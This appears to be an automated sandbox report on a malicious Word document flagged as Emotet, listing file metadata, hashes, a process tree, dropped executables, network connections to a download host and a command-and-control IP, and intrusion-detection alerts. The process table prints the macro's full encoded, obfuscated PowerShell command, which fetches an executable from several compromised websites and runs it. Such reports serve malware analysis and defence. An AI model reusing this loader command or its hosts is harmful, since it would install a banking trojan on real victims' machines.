File name: | 賞与支.doc |
Full analysis: | https://app.any.run/tasks/34961972-3773-42fb-8fcc-9f3926c6aa79 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 30, 2020, 00:54:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Tenetur., Author: Lo Boyer, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 23:27:00 2020, Last Saved Time/Date: Tue Sep 29 23:27:00 2020, Number of Pages: 1, Number of Words: 3109, Number of Characters: 17727, Security: 8 |
MD5: | 1405F3D40ACED3D5BBE7153C4E186E9C |
SHA1: | 379F779E590425EBFB4C6A4719069C26C9FD363D |
SHA256: | C9EE15C0A0084232D9C7E2E5F5F2550F4CEC9E7455B65E0022929F58307B1BA2 |
SSDEEP: | 1536:I/7iQQsfDqOxqr7OxDiGmrYL7+chKas7V7tq9jD4RuqM1VetqjpcSoUlM:ImQbfrUr74iH8Zcag7tWLytypXlM |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
LocaleIndicator: | 1033 |
CodePage: | Unicode UTF-16, little endian |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 20795 |
Paragraphs: | 41 |
Lines: | 147 |
Company: | - |
Security: | Locked for annotations |
Characters: | 17727 |
Words: | 3109 |
Pages: | 1 |
ModifyDate: | 2020:09:29 22:27:00 |
CreateDate: | 2020:09:29 22:27:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Léo Boyer |
Subject: | - |
Title: | Tenetur. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1336 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\賞与支.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3212 | POwersheLL -ENCOD JABOAGMAdgBvAHQAdAB1AD0AKAAoACcATQB0ACcAKwAnAHIAdgAzACcAKQArACcAcgBoACcAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdQBzAGUAUgBQAFIAbwBmAGkATABFAFwAcgBxAF8AXwBOAFAANwBcAE8AbQA4AGkASABkAFcAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBjAFQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAGAAVQBSAGkAVABZAGAAUABSAE8AYABUAE8AYwBgAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKwAoACcALAAgAHQAbABzADEAMQAnACsAJwAsACAAdAAnACsAJwBsACcAKQArACcAcwAnACkAOwAkAE8AdAB2ADAAeQBtAHkAIAA9ACAAKAAnAE0AbwAnACsAJwAwAGQAJwArACgAJwB1ACcAKwAnAGkAawAnACkAKwAnAGYAcgAnACkAOwAkAEYAegBqADkANAByADgAPQAoACcASwAnACsAKAAnAHYAMgBqACcAKwAnAF8AJwApACsAJwBlADgAJwApADsAJABQAG0AdwAzAGEAZgBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAGIAVAAnACsAKAAnAEYAUgAnACsAJwBxACcAKQArACgAJwBfAF8AbgAnACsAJwBwACcAKQArACgAJwA3AGIAJwArACcAVAAnACkAKwAoACcARgBPACcAKwAnAG0AOABpAGgAJwArACcAZAB3ACcAKQArACcAYgAnACsAJwBUAEYAJwApAC4AIgBSAEUAYABQAEwAYABBAGMARQAiACgAKABbAEMAaABBAHIAXQA5ADgAKwBbAEMAaABBAHIAXQA4ADQAKwBbAEMAaABBAHIAXQA3ADAAKQAsACcAXAAnACkAKQArACQATwB0AHYAMAB5AG0AeQArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAE4ANgAwAGsAdABkAGUAPQAoACgAJwBUADUAZQAnACsAJwBzAG8AJwApACsAJwBrADMAJwApADsAJABNADMAMgBnADEAZgBsAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAGUAVAAuAFcAZQBiAEMAbABJAEUATgBUADsAJABUAHkAdQBhAGQAbgBwAD0AKAAnAGgAdAAnACsAJwB0ACcAKwAoACcAcAA6ACcAKwAnAC8ALwBwACcAKwAnAGEAJwApACsAJwByACcAKwAnAGwAJwArACgAJwBhAHkAJwArACcAagAnACkAKwAoACcAdQAnACsAJwBkACcAKwAnAGkAYgBvAGwAJwApACsAJwBhAC4AJwArACcAYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAnACkAKwAnAC0AaQAnACsAJwBuACcAKwAoACcAYwBsAHUAJwArACcAZAAnACkAKwAnAGUAcwAnACsAJwAvACcAKwAoACcAWAAnACsAJwAvACoAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAOgAvACcAKwAnAC8AZgAnACsAJwByAGUAJwArACcAcwBoAGEAbgBkACcAKwAnAG0AbwByACcAKwAnAGUAbgBwACcAKQArACcALgAnACsAJwBjAG8AJwArACcAbQAnACsAJwAvACcAKwAnAHcAJwArACcAcAAnACsAKAAnAC0AYQBkACcAKwAnAG0AJwApACsAKAAnAGkAbgAnACsAJwAvAGkAbQAnACkAKwAoACcAYQBnACcAKwAnAGUAcwAnACsAJwAvAGIAJwArACcAbgBvADcARwBUADcARgAnACkAKwAoACcAeQAvACcAKwAnACoAJwApACsAKAAnAGgAdAAnACsAJwB0ACcAKQArACgAJwBwADoAJwArACcALwAnACkAKwAoACcALwBkACcAKwAnAGkAbgBhACcAKwAnAHAAYQB0ACcAKwAnAHIAJwApACsAJwBpAGsAJwArACcAYQAnACsAKAAnAC4AYwBvAG0AJwArACcALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtAGkAJwArACcAbgAvAFUAJwApACsAKAAnAFkAVgAnACsAJwA3AHQATQA0AFcAQgAvACcAKwAnACoAJwApACsAJwBoAHQAJwArACcAdABwACcAKwAoACcAOgAvACcAKwAnAC8AJwArACcAcABvAHIAdABhACcAKQArACgAJwBsAC0AJwArACcAbQBzAC4AJwApACsAJwBpACcAKwAoACcAbgBmACcAKwAnAG8AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AJwApACsAKAAnAGkAJwArACcAbgBjACcAKQArACgAJwBsAHUAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwBzAC8AagAnACsAJwBqAFUANQA1ACcAKwAnAEwAJwArACcALwAqACcAKwAnAGgAdAB0AHAAJwArACcAcwA6AC8AJwArACcALwBsAGEAcAAnACkAKwAoACcAYQBwACcAKwAnAGUAJwApACsAKAAnAHQAZQByAGkAYQAuAGEAJwArACcAdAAvACcAKwAnAHcAcAAtAGkAbgBjACcAKQArACcAbAB1ACcAKwAoACcAZABlACcAKwAnAHMALwAnACkAKwAnAFgAJwArACcAYgB0ACcAKwAoACcAeQAnACsAJwB3AEYAJwApACsAKAAnAFAALwAqACcAKwAnAGgAdAAnACkAKwAoACcAdABwACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwB3AHcAJwApACsAJwB3AC4AJwArACcAdAB5ACcAKwAoACcAYwBvAG8AJwArACcAbgBlACcAKQArACcAbABlACcAKwAnAHYAJwArACcAYQB0ACcAKwAoACcAbwAnACsAJwByACcAKwAnAHMALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQAnACsAJwBuAHQAJwApACsAKAAnAC8AVAAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAJwBwACcAKwAoACcAOgAnACsAJwAvAC8AZABhAGYAJwApACsAJwB0ACcAKwAoACcAYQAnACsAJwByACcAKwAnAHMAJwArACcAaQB0AHUAcwBqAHUAZABpAGIAJwApACsAKAAnAG8AJwArACcAbAAnACsAJwBhAHQAZQByAHAAJwApACsAKAAnAGUAJwArACcAcgBjAGEAJwApACsAJwB5AGEAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAnAG0ALwAnACsAJwB3AHAAJwArACcALQBpACcAKwAnAG4AJwArACgAJwBjAGwAJwArACcAdQBkACcAKQArACgAJwBlAHMAJwArACcALwB6ACcAKQArACcATwAnACsAJwAvACcAKQAuACIAUwBQAGAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABZAGkAbAA3AGwAdQAxAD0AKAAoACcAUgAnACsAJwBlAGIAeAAnACkAKwAnAGMAaAAnACsAJwBvACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEQAZgA4AHcAdQB1AGkAIABpAG4AIAAkAFQAeQB1AGEAZABuAHAAKQB7AHQAcgB5AHsAJABNADMAMgBnADEAZgBsAC4AIgBEAE8AVwBgAE4AYABMAG8AYABBAEQARgBJAEwAZQAiACgAJABEAGYAOAB3AHUAdQBpACwAIAAkAFAAbQB3ADMAYQBmAGcAKQA7ACQARgBmADIAcQBoAGcAMwA9ACgAKAAnAE8AZwAnACsAJwBnAF8AJwApACsAKAAnAG0AJwArACcAbwBqACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFAAbQB3ADMAYQBmAGcAKQAuACIATABFAGAATgBgAEcAdABIACIAIAAtAGcAZQAgADIAMgA3ADEANQApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAZQAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACgAJABQAG0AdwAzAGEAZgBnACkAOwAkAEgAbQAzADUAYQBkADkAPQAoACgAJwBaACcAKwAnAHgAcABiACcAKQArACcAcwBhACcAKwAnAHUAJwApADsAYgByAGUAYQBrADsAJABIAGwAaQB1AGwAagAzAD0AKAAnAEYAbAAnACsAKAAnAGYAbwAyACcAKwAnAHkAawAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAA0ADMANwB4AGEAZwA9ACgAKAAnAFUAbABpACcAKwAnAHUAbgAnACsAJwBjACcAKQArACcAYwAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2268 | "C:\Users\admin\Rq__np7\Om8ihdw\Mo0duikfr.exe" | C:\Users\admin\Rq__np7\Om8ihdw\Mo0duikfr.exe | POwersheLL.exe | |
User: admin Company: Flex Inc. Integrity Level: MEDIUM Description: Replacement for the Masked Edit Control v 2.0. Exit code: 0 Version: 2.8.0.3 | ||||
2856 | "C:\Users\admin\AppData\Local\rasgcw\mfc120enu.exe" | C:\Users\admin\AppData\Local\rasgcw\mfc120enu.exe | Mo0duikfr.exe | |
User: admin Company: Flex Inc. Integrity Level: MEDIUM Description: Replacement for the Masked Edit Control v 2.0. Version: 2.8.0.3 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR76A1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3212 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WJAEQ9NESQMMJZVRE3V3.temp | — | |
MD5:— | SHA256:— | |||
2268 | Mo0duikfr.exe | C:\Users\admin\AppData\Local\Temp\~DFB82E073EF44A011D.TMP | — | |
MD5:— | SHA256:— | |||
1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:D434B7C64380F438642058EEF63959A1 | SHA256:A0FE63861AC3B48464A566E2DB5BF2F570E905EB9E7E991ABAEB932C4141DA68 | |||
1336 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:494F1A3E7D4E62C87D389760854A6B71 | SHA256:C56CD81A0C2EBDA433EF8B1FF676C255DD13355C282D47E840DC6451C4BF872E | |||
3212 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
3212 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF228130.TMP | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
1336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$賞与支.doc | pgc | |
MD5:7A1708DD85C6991A77E2266110E4502C | SHA256:728DC9EE1ECB67B6A8C8691B27C3B4E2A22C04064D84E570CF1D1251E5D13A1A | |||
2268 | Mo0duikfr.exe | C:\Users\admin\AppData\Local\rasgcw\mfc120enu.exe | executable | |
MD5:F05C83E9AAA1789BBF9E2122BC2ABFF1 | SHA256:CBFEA69DD5DDF98AF616C47DE1BE54CFD3E0DEE219F3EFD4ED98F881AE1A76E7 | |||
3212 | POwersheLL.exe | C:\Users\admin\Rq__np7\Om8ihdw\Mo0duikfr.exe | executable | |
MD5:F05C83E9AAA1789BBF9E2122BC2ABFF1 | SHA256:CBFEA69DD5DDF98AF616C47DE1BE54CFD3E0DEE219F3EFD4ED98F881AE1A76E7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2856 | mfc120enu.exe | POST | 200 | 116.91.240.96:80 | http://116.91.240.96/GZKgvD/ | JP | binary | 132 b | malicious |
3212 | POwersheLL.exe | GET | 200 | 164.132.10.28:80 | http://parlayjudibola.com/wp-includes/X/ | PT | executable | 400 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2856 | mfc120enu.exe | 116.91.240.96:80 | — | ARTERIA Networks Corporation | JP | malicious |
3212 | POwersheLL.exe | 164.132.10.28:80 | parlayjudibola.com | OVH SAS | PT | suspicious |
Domain | IP | Reputation |
---|---|---|
parlayjudibola.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3212 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3212 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3212 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2856 | mfc120enu.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M10 |